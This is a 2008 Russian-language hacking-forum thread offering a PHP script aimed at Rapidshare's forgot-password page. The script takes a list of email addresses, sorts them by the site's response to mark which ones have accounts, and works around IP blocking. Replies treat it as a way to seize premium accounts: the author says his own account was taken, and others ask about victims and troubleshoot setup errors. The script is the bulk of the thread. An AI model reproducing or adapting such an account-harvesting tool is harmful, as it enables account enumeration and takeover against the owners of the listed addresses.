Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Extracting User/Pass from Rapidshare.com |

06.02.2008, 04:23
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме: 16641028
Репутация:
2371
|
|
Extracting User/Pass from Rapidshare.com
Extracting User/Pass from Rapidshare.com
PHP код:
<?php
session_start();
$browserData = array();
$browserData[CURLOPT_USERAGENT] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9";
$browserData[CURLOPT_FOLLOWLOCATION] = true;
$browserData[CURLOPT_COOKIESESSION] = true;
$browserData[CURLOPT_COOKIEFILE] = "cookie";
$browserData[CURLOPT_COOKIEJAR] = "cookie";
function curlInit($link,&$browserData,$ssh = false)
{
$ch = curl_init($link);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, !$ssh);
curl_setopt_array ($ch,$browserData);
return $ch;
}
function array2postFields($data)
{
$data = (array) $data;
$postData = "";
foreach($data as $name => $value)
$postData .= $name . "=" . $value . "&";
$postData = substr($postData,0,-1);
return $postData;
}
class rapidshare
{
function __construct(&$browserData)
{
$this->browserData = &$browserData;
$this->link = "http://rapidshare.com/cgi-bin/forgotpw.cgi";
}
function requestpassword($username)
{
$ch = curlInit($this->link,$this->browserData,false);
$data = array("email"=>$username);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,array2postFields($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$responseText = curl_exec($ch);
curl_close($ch);
return $responseText;
}
function translateResponse($responseText)
{
$responseRegexs = array(
"noaccounts" => "No accounts found. Please try again",
"valid" => "accounts and sent the data to your e-mail address",
"invalid" => "E-Mail address invalid!",
"ipblocked" => "Too many password requests from your IP-Address! Please try again in one hour"
);
foreach($responseRegexs as $name => $value)
if (preg_match('%' . $value . '%', $responseText))
return $name;
return false;
}
function testUser(&$user)
{
$responseText = $this->requestpassword($user["username"]);
$response = $this->translateResponse($responseText);
if($response == "ipblocked" || !$response)
{
echo "<div style='margin-bottom:2%;'>IP BLOCKED. Next try in <span id='clock'></span> seconds. Leave the window opened for autorefresh, or change your ip</div>";
$waitingTime = 3610;
$clockScript=
<<<CLOCK
<script>
waitingTime = $waitingTime;
function showClock()
{
clockHolder = document.getElementById("clock");
clockHolder.innerHTML = waitingTime--;
}
showClock();
window.setInterval(showClock,1000);
</script>
CLOCK;
echo $clockScript;
echo "<META HTTP-EQUIV='Refresh' CONTENT='{$waitingTime};URL='>";
return false;
}
else
{
$user["response"] = $response;
return true;
}
}
}
?>
<body style="background-color:black;color:white">
<?php
if(isset($_GET["reset"]))
$_SESSION = array();
$users = &$_SESSION["users"];
$info = &$_SESSION["info"];
if(!isset($users))
{
if(!empty($_POST["users"]))
{
function validUsername(&$username)
{
$username = strtolower($username);
return preg_match('/\A[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,4}\Z/',$username);
}
$users = array();
$lines = explode("\n",$_POST["users"]);
foreach($lines as $line)
{
if (get_magic_quotes_gpc())
$line = stripslashes($line);
$username = trim($line);
if(validUsername($username))
{
$users[] = array(
"username" => $username,
"response" => false
);
}
}
$info["nUsers"] = count($users);
$info["currentUser"] = 0;
if(!$info["nUsers"])
{
$_POST = array();
$_SESSION = array();
}
}
if(empty($_POST["users"]))
{
?>
<div>Give me some list of emails</div>
<div>You can freely refresh the window</div>
<form action="?" method="POST">
<textarea cols="50" rows="25" name="users" onclick="this.innerHTML='',this.onclick=''">mafia@xeka.ru
billy@microsoft.com</textarea><br>
<input type="submit" value="submit">
</form>
<?php
}
}
if(isset($users))
{
$rapidshare = new rapidshare($browserData);
$exec = $_GET["exec"];
if(isset($exec))
{
for($n = $info["currentUser"] ; $n < $info["nUsers"]; $n++)
{
if ($rapidshare->testUser($users[$n]))
$info["currentUser"]++;
else
{
break;
}
}
}
echo "Tested: " . $info["currentUser"] . " users<br><br>";
for($n = 0 ; $n < $info["currentUser"]; $n++)
{
$user = $users[$n];
printf("Username: %s - ",$user["username"]);
switch($user["response"])
{
case "invalid":
{
echo "doesn't work. invalid";
break;
}
case "noaccounts":
{
echo "doesn't work";
break;
}
case "valid":
{
echo "<b>just WORKS!</b>";
break;
}
default:
{
echo ".unable to test. Contact the author";
}
}
echo "<br>";
}
echo "<div><a href='?exec'>EXEC</a></div>";
}
?>
<div><a href="?reset">RESET</a></div>
</body>
© underground.com
|
|
|

06.02.2008, 04:35
|
|
Постоянный
Регистрация: 08.10.2006
Сообщений: 445
Провел на форуме: 1028732
Репутация:
80
|
|
ух ты, такого ещё не было.
|
|
|

06.02.2008, 12:46
|
|
Новичок
Регистрация: 26.01.2008
Сообщений: 7
Провел на форуме: 97053
Репутация:
5
|
|
Если честно, я в этом полный 0. Этот скрипт заливать на сервер и на него отправлять жертв?
|
|
|

06.02.2008, 13:32
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме: 16641028
Репутация:
2371
|
|
Попробуйте вписать туда мыльники и свое тоже))
Придет что-то типа как мне:
Hello.
You have requested your password. Here is your login data:
==============================
Login: 735663
Password: 1922175
==============================
Check our your premium-zone as well to set up several options for downloading files.
Best regards,
RapidShare AG - Support-Team
|
|
|

06.02.2008, 15:47
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме: 16641028
Репутация:
2371
|
|
Не надо мне в пм писать...
Вставляете список email flресов владельцев премиум акков...
Test, EXEC
Just Works -> Complete
//Мда..мой акк разорвали =\
|
|
|

06.02.2008, 16:25
|
|
Постоянный
Регистрация: 08.10.2006
Сообщений: 445
Провел на форуме: 1028732
Репутация:
80
|
|
Сообщение от Isis
Не надо мне в пм писать...
Вставляете список email flресов владельцев премиум акков...
Test, EXEC
Just Works -> Complete
//Мда..мой акк разорвали =\
ага, не надо было показывать
|
|
|

06.02.2008, 17:17
|
|
Постоянный
Регистрация: 15.03.2006
Сообщений: 600
Провел на форуме: 5091304
Репутация:
1203
|
|
Че-то я не догоняю ... сначала не заводился
Parse error: syntax error, unexpected T_SL in rapid.php on line 82
Завел ...
Список мыл вставляю ... сабмит и:
Tested: 0 users
EXEC
RESET
Жмем экзек:
Fatal error: Call to undefined function curl_init() in rapid.php on line 14
|
|
|

06.02.2008, 17:23
|
|
Новичок
Регистрация: 26.01.2008
Сообщений: 7
Провел на форуме: 97053
Репутация:
5
|
|
Дык как же ты завёл расскажи плз)
//Мда..мой акк разорвали =\
Он твой? Я думал ты спец. в паблик выложил
|
|
|

06.02.2008, 17:29
|
|
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме: 3986705
Репутация:
1403
|
|
Fatal error: Call to undefined function curl_init() in rapid.php on line 14
Кривой PHP... Возможно ты не подключил модуль
|
|
|

06.02.2008, 17:32
|
|
Постоянный
Регистрация: 15.03.2006
Сообщений: 600
Провел на форуме: 5091304
Репутация:
1203
|
|
bul.666, стоит курл, и на локалке и на хосте тыкал
|
|
|
|
 |
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
RapidShare.com
|
Talisman |
Болталка |
25 |
20.01.2008 02:43 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|